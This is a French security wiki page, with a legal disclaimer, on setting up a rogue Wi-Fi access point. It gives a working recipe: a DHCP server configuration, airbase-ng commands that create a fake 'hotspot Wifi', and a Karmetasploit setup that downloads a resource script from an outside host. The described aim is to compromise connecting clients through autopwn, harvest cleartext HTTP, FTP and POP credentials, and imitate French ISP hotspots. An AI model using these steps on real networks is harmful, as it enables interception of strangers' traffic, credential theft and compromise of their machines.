Rogue AP
🔒 Contenu de sécurité — usage encadré
Cette page décrit des techniques de sécurité offensive à des fins exclusivement pédagogiques et professionnelles (formation, préparation de certification, montée en compétence défensive).
Ces techniques ne doivent être mises en œuvre que dans un laboratoire isolé ou sur un système pour lequel vous disposez d'une autorisation écrite explicite du propriétaire. Les employer contre un système tiers sans autorisation est une infraction pénale (art. 323-1 et suivants du Code pénal). Voir les avertissements généraux.
| Fiche express | |
|---|---|
| Domaine | Faux point d'acces (rogue AP) |
| Outils | airbase-ng, dhcpd, Karmetasploit
|
| Objectif | Interception de trafic, depot de backdoor |
Un rogue AP est un faux point d'acces (hotspot fictif) mis en place pour attirer des clients et intercepter leur trafic, voire deposer une porte derobee (backdoor).
Serveur DHCP
Installer et configurer un serveur DHCP :
apt-get install dhcp3-server
vi /etc/dhcp3/dhcpd.conf
Exemple de configuration :
option T150 code 150 = string;
deny client-updates;
one-lease-per-client false;
allow bootp;
ddns-updates off;
ddns-update-style interim;
authoritative;
subnet 10.0.0.0 netmask 255.255.255.0 {
interface at0;
range 10.0.0.100 10.0.0.254;
option routers 10.0.0.1;
option subnet-mask 255.255.255.0;
option domain-name-servers 10.0.0.1;
allow unknown-clients;
}
Creation du point d'acces
Activer le mode moniteur puis creer l'interface d'injection at0 :
airmon-ng start wlan0
airbase-ng -P -C 30 -e "hotspot Wifi" -v mon0
Configurer l'adresse IP fixe de l'AP et demarrer le DHCP :
ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
/etc/init.d/dhcp3-server restart
Le point d'acces est pret ; reste la partie malveillante.
Karmetasploit
Karmetasploit associe Karma et Metasploit :
svn co http://metasploit.com/svn/framework3/trunk msf3
wget http://digitaloffense.net/tools/karma.rc
./msfconsole -r karma.rc
Une fois un client connecte, la configuration cherche a compromettre sa machine via autopwn et recupere au passage les identifiants transitant en clair (HTTP, FTP, POP). Des profils de faux points d'acces imitant les principaux FAI francais sont disponibles.
Voir aussi
- Gerix-wifi-cracker — creation de faux AP en mode graphique
- Configurer ubuntu en hotspot — mise en place d'un hotspot legitime
- Metasploit